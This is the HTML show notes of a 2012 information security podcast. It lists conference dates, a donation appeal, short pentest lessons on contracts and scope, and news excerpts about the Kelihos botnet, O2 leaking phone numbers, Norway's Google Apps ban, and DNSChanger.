<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pentest Lessons:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adam Compton &amp; Zac Wagle&#39;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/pentestlessons</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 1: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you are beginning to freelance, make sure you have solid contracts and have a lawyer read the contract drafts. &nbsp;Core released some boilerplate examples about a year ago that are floating around on the internet available to freely use. &nbsp;Also, when you talk to a lawyer, don&rsquo;t make small talk. &nbsp;The rates they charge make pentesters look like a bunch of chumps, and they charge for every minute you have their attention.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 2:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Depending on the nature of your pentest, consider adding geography into the scope agreement. &nbsp;Shortly after Firesheep was released, I caught an executive of the company I was testing as he accessed wifi at the Starbucks down the street. &nbsp;The company attempted to invalidate the results because I did not have a specific clause stating that I could act outside of the physical building.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 3:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Many small-business IT outsourcing firms are now tacking &ldquo;Security&rdquo; onto their product offerings (for example &ldquo;Bob&rsquo;s Computers: Service, Sales, Security&rdquo;). &nbsp;As a result, many young techs are being shovelled into security audits without having any clue that security extends beyond asking if backups are being stored offsite, and that user drives have appropriate permissions. &nbsp;Fear not, there&rsquo;s a resource for this: THE PTES. &nbsp;Read it; use the appropriate sections, google the shit out of everything you don&rsquo;t understand.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[Thanks listener Adam]</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerworld.com/s/article/9223667/Accused_Kelihos_botnet_maker_worked_for_two_security_firms"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9223667/Accused_Kelihos_botnet_maker_worked_for_two_security_firms</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Russian man who was accused Monday by Microsoft of creating the Kelihos botnet worked for a pair of security-related firms from 2005 to 2011, according to evidence on the Web.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In an amended complaint filed yesterday in federal court, Microsoft identified the man as Andrey Sabelnikov of St. Petersburg.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to his LinkedIn profile, Sabelnikov worked for two Russian companies that specialize in security, including the antivirus firm Agnitum, for the last six years.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Agnitum, which is based in St. Petersburg, develops and sells a Windows antivirus product called OutPost Antivirus Pro as well as a personal firewall for Windows PCs. A company spokesman confirmed today that Sabelnikov worked for the firm from September 2005 until November 2008.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sabelnikov held a number of tiles, ending his time with Agnitum as a project manager responsible for everything from &quot;designing the product architecture&quot; to &quot;implementing &#8230; critical parts of code.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In an emailed reply to questions, the Agnitum spokesman said that Sabelnikov &quot;resigned by his own will in late 2008.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">From November 2008 until December 2011, Sabelnikov worked for another Russian company, Retunil, which also markets security software. Returnil&#39;s primary product, Virtual System Pro, clones an existing copy of Windows in a virtual machine as a way to protect users from malware.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.thinkbroadband.com/news/4990-o2-shares-your-mobile-phone-number-with-every-website-you-visit.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thinkbroadband.com/news/4990-o2-shares-your-mobile-phone-number-with-every-website-you-visit.html</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you&#39;re reading this news article using your O2 mobile phone, you&#39;ll be pleased to know that O2 have already sent us your mobile phone number within the HTTP headers which normally contain information about how content can be displayed on your device. These headers are not normally seen by users, and usually not logged by most websites, but the flaw allows malicious sites to get more personal information about you than you may be willing to share.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For example, if you open an e-mail which includes references to external images, the mere action of opening the e-mail would divulge your phone number. This could be used by anyone undertaking a phishing attack or other scam to get more information from you. The opportunity to abuse this is potentially endless.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://blogs.ft.com/fttechhub/2012/01/google-faces-norwegian-public-sector-ban/#axzz1kPjBMnTo"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.ft.com/fttechhub/2012/01/google-faces-norwegian-public-sector-ban/#axzz1kPjBMnTo</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Norwegian public sector organisations will be banned from using Google Apps after the Norwegian data protection authorities ruled that the service could put citizens&rsquo; personal data at risk.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The data protection authority said Google Apps did not comply with Norwegian privacy &nbsp;laws because there was insufficient information about where data was being kept. The decision came from a test case in Narvik, where the local council had chosen to use Google Apps for their email.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Norwegian ban comes just as things were going so well for Google Apps in Europe, with the company winning its largest ever contract with BBVA, the Spanish bank.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now, however, Google could find access to swathes of public sector work effectively closed. Early last year, there was a similar decision in Denmark, where the town of Odense was banned from using Google Apps in its schools. Privacy regulators were concerned that if teachers used Google&rsquo;s document and calendar functions for lesson planning, student assessment and communicating with parents, it would leave some sensitive personal data at risk.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://www.net-security.org/secworld.php?id=12267"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.net-security.org/secworld.php?id=12267</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For individuals and companies that have a bad online reputation, online reputation management (ORM) services might sound like a good investment. Such services are not illegal, even though search engines such as Google do not look favorably upon them.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But every now and then, some firms offering those services succumb to the temptation of using illegal means to achieve their goal. And, according to Fox News, California-based Rexxfield is currently being accused of belonging to that group.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As Darren Meade, a former CEO of another California-based company, tells it, Rexxfield owner Michael Roberts shared with him his intent of buying and using hacking code to surreptitiously modify websites containing negative comments and make them drop down in search results.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The code in question allegedly allows users to inject a &quot;noindex&quot; tag into the source code of these sites, which makes search engine crawlers skip indexing them and, thus, effectively hiding them from the great majority of users. Roberts even demonstrated to Meade the effectiveness of the code in question by hacking Ripoff Report, a popular online consumer complaint site.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://www.networkworld.com/news/2012/012412-authorities-prepare-to-close-down-255242.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.networkworld.com/news/2012/012412-authorities-prepare-to-close-down-255242.html</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">German authorities are advising victims of DNSChanger Trojan programs to fix their computers&#39; Domain Name System settings using a free tool developed by antivirus company Avira, because the servers resolving DNS queries on their behalf will be closed down on March 8.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DNSChanger is a family of Trojans for Windows and Mac OS X whose primary function is to replace the DNS servers defined on the victim&#39;s computer with rogue ones operated by the malware&#39;s authors.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The DNS is a vital part of the Internet infrastructure and is used to resolve domain names into numerical IP addresses. By controlling DNS responses, the DNSChanger gang was able to redirect victims to rogue websites that distributed fraudulent software or displayed money-generating advertisements.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The DNSChanger operation was shut down by the U.S. Federal Bureau of Investigation in November last year following a two-year long investigation. The authorities estimated the number of computers infected with this type of Trojan at 500,000 in the U.S. and over 4 million worldwide. </span></p>
